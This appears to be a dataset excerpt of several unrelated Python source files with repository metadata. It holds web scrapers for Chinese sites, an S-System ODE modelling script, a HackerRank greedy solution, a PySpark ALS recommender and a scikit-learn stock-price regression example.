url = "https://www.v2ex.com"
v2ex = BeautifulSoup(requests.get(url).text,'html.parser')
for span in v2ex.find_all('span',class_='item_hot_topic_title'):
print(span.find('a').text,span.find('a')['href'])
for title in v2ex.find_all("a",class_="topic-link"):
print(title.text,url+title["href"])
# 煎蛋爬虫图片
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'
}
def download_file(url):
'''下载图片'''
print('Downding %s' %url)
local_filename = url.split('/')[-1]
img_path = "/Users/zhangc/Desktop/GitTest/project_Buger_2/Python爬虫/img/" + local_filename
print(local_filename)
r = requests.get(url, stream=True, headers=headers)
with open(img_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
return img_path
url = 'http://jandan.net/drawings'
soup = BeautifulSoup(requests.get(url, headers=headers).text, 'html.parser')
def valid_img(src):
'''判断地址符不符合关键字'''
return src.endswith('jpg') and '.sinaimg.cn' in src
for img in soup.find_all('img', src=valid_img):
src = img['src']
if not src.startswith('http'):
src = 'http:' + src
download_file(src)
# 知乎热门
headers ={
"user-agent":"user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
}
url = "https://www.zhihu.com/explore"
zhihu = BeautifulSoup(requests.get(url,headers=headers).text,"html.parser")
for title in zhihu.find_all('a',class_="ExploreSpecialCard-contentTitle"):
print(title.text)
# selenium爬虫
url = "https://www.zhihu.com/explore"
driver = webdriver.Chrome("/Users/zhangc/Desktop/GitTest/project_Buger_2/poium测试库/tools/chromedriver")
driver.get(url)
info = driver.find_element(By.CSS_SELECTOR,"div.ExploreHomePage-specials")
for title in info.find_elements(By.CSS_SELECTOR,"div.ExploreHomePage-specialCard > div.ExploreSpecialCard-contentList > div.ExploreSpecialCard-contentItem > a.ExploreSpecialCard-contentTitle"):
print(title.text,title.get_attribute('href')) | Owen-ET/project_Buger_2 | Python爬虫/get_htmlText.py | get_htmlText.py | py | 2,735 | python | en | code | 0 | github-code | 36 |
28295137025 | from mmsystem import Goldbeter_1995
from ssystem import SSystem
from sigmoidal import Sigmoidal
import matplotlib.pyplot as plt
import numpy as np
mm_model = Goldbeter_1995()
steps = 50
delta = 0.01
#states, velocities = mm_model.run(state=initial_state, velocity=initial_velocity, delta=0.1, steps=3)
#for i in range(states.shape[1]):
# plt.plot(states[:,i], label="MM X {}".format(i+1))
trainer = SSystem(n_vars=4)
trainer.g = np.array([[0, 0, -0.8, 0], [0.5, 0, 0, 0], [0, 0.75, 0, 0], [0.5, 0, 0, 0]])
trainer.h = np.array([[0.5, 0, 0, 0], [0, 0.75, 0, 0], [0, 0, 0.5, 0.2], [0, 0, 0, 0.8]])
trainer.alpha = np.array([12., 8., 3., 2.])
trainer.beta = np.array([10., 3., 5., 6.])
all_states = []
all_velocities = []
while len(all_states) < 1:
initial_state = np.random.random(4)
initial_velocity = np.random.random(4)
states, velocities = trainer.run(state=initial_state, velocity=initial_velocity, delta=delta, steps=steps)
if not np.any(np.isnan(states)) and not np.any(np.isnan(velocities)):
all_states.append(states)
all_velocities.append(velocities)
all_states = np.vstack(all_states)
all_velocities = np.vstack(all_velocities)
for i in range(states.shape[1]):
plt.plot(states[:,i], label="Trainer X {}".format(i+1))
#ssystem = SSystem(n_vars=4)
#ssystem.solve(all_states, all_velocities, iterations=1)
#states, velocities = ssystem.run(state=initial_state, velocity=initial_velocity, delta=delta, steps=steps)
#for i in range(states.shape[1]):
# plt.plot(states[:,i], label="S-Sys X {}".format(i+1))
nnsystem = Sigmoidal(n_vars=4)
nnsystem.solve(all_states, all_velocities)
states, velocities = nnsystem.run(state=initial_state, velocity=initial_velocity, delta=delta, steps=steps)
for i in range(states.shape[1]):
plt.plot(states[:,i], label="S-Sys X {}".format(i+1))
plt.legend()
plt.show()
| warut-vijit/modelsel | main.py | main.py | py | 1,856 | python | en | code | 0 | github-code | 36 |
74160088423 | #!/bin/python3
import sys
def toys(w, n):
w = sorted(w)
min_weight = w[0]
level = 1
for each in w:
if each <= min_weight + 4:
continue
else:
min_weight = each
level += 1
return level
if __name__ == "__main__":
n = int(input().strip())
w = list(map(int, input().strip().split(' ')))
result = toys(w, n)
print(result) | CodingProgrammer/HackerRank_Python | (Greedy)Priyanka_and_Toys.py | (Greedy)Priyanka_and_Toys.py | py | 411 | python | en | code | 0 | github-code | 36 |
70516415785 | import os
import os.path
import sys
from pyspark import SparkContext
from pyspark.mllib.recommendation import ALS
from numpy import array
if __name__ == "__main__":
data_file = '/spark/data/als.data'
if len(sys.argv) == 1:
print >> sys.stderr, "Usage: filtering.py <master>"
exit(-1)
else:
sc = SparkContext(sys.argv[1], "Collaborative Filtering")
data = sc.textFile(data_file)
ratings = data.map(lambda line: array([float(x) for x in line.split(',')]))
# Build the recommendation model using Alternating Least Squares
model = ALS.train(ratings, 1, 20)
# Evaluate the model on training data
testdata = ratings.map(lambda p: (int(p[0]), int(p[1])))
predictions = model.predictAll(testdata).map(lambda r: ((r[0], r[1]), r[2]))
ratesAndPreds = ratings.map(lambda r: ((r[0], r[1]), r[2])).join(predictions)
MSE = ratesAndPreds.map(lambda r: (r[1][0] - r[1][1])**2).reduce(lambda x, y: x + y)/ratesAndPreds.count()
print("Mean Squared Error = " + str(MSE))
| jhorey/ferry | ferry/data/dockerfiles/spark/filtering.py | filtering.py | py | 1,072 | python | en | code | 253 | github-code | 36 |
42579037186 | import math
import datetime
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
from sklearn import preprocessing, model_selection, svm
from sklearn.linear_model import LinearRegression
style.use('ggplot')
#reading from excel converting into data frame
df=pd.read_excel("stock_data.xlsx")
df=df.set_index('Date')
#doing basic operation to get "high- low" percentage change
df = df[['Adj. Open', 'Adj. High', 'Adj. Low', 'Adj. Close', 'Adj. Volume']]
#df.set_index('Date', inplace=True)
df['HL_PCT'] = (df['Adj. High'] - df['Adj. Low']) / df['Adj. Close'] * 100.0
df['PCT_change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open'] * 100.0
df = df[['Adj. Close', 'HL_PCT', 'PCT_change', 'Adj. Volume']]
#defining the label
forecast_col = 'Adj. Close'
df.fillna(value=-99999, inplace=True)
forecast_out = int(math.ceil(0.01 * len(df)))
df['label'] = df[forecast_col].shift(-forecast_out)
#preprocessing of data before applying the algorithm
X = np.array(df.drop(['label'], 1))
X = preprocessing.scale(X)
X_lately = X[-forecast_out:]
X = X[:-forecast_out]
df.dropna(inplace=True)
y = np.array(df['label'])
#defining the trainin set and testing set from data.
# 80% is the traning set and 20% is the testing you can also modify this as per your requirement
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.2)
#so we are using linearRegression model
#using all the thread available for processing
clf = LinearRegression(n_jobs=-1)
clf.fit(X_train, y_train)
#this is the score for your algorithm
#you should always go with algorith with the highest score.
confidence = clf.score(X_test, y_test)
print(confidence)
#now using the algorith to predict values
forecast_set = clf.predict(X_lately)
df['Forecast'] = np.nan
#86400 is the number of seconds in one year
#df.set_index('Date', inplace=True)
last_date = df.iloc[-1].name
last_unix = last_date.timestamp()
one_day = 86400
next_unix = last_unix + one_day
for i in forecast_set:
next_date = datetime.datetime.fromtimestamp(next_unix)
next_unix += 86400
df.loc[next_date] = [np.nan for _ in range(len(df.columns)-1)]+[i]
#ploting the prediction on a graph
df['Adj. Close'].plot()
df['Forecast'].plot()
plt.legend(loc=4)
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
| rajdeep7dev/Prediction-of-stock-prices | ml_1.py | ml_1.py | py | 2,335 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.